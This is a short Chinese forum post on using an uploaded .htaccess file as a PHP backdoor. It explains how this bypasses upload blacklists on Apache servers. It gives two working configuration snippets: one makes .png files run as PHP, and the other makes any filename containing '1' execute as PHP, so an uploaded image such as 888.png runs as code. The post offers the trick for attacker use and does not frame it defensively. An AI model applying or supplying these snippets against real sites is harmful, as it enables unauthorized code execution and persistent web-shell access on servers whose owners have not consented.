搜索
查看: 5140|回复: 0

.htaccess文件构成的PHP后门

[复制链接]

105

主题

51

回帖

298

积分

中级会员

积分
298
发表于 2021-1-5 16:31:30 | 显示全部楼层 |阅读模式 来自 甘肃
[md]一般 `.htaccess` 可以用来留后门和针对黑名单绕过

创建一个 txt 写入(png 解析为 PHP)

```
AddType application/x-httpd-php .png
```

另存为 `.htaccess`

上传 `.htaccess` 必须是网站根路径

可以在 `.htaccess ` 加入 PHP 解析规则

类似于把文件名包含 1 的解析成 PHP

```
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
```

**888.png**  就会以 **PHP** 执行
[/md]
专业装逼!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表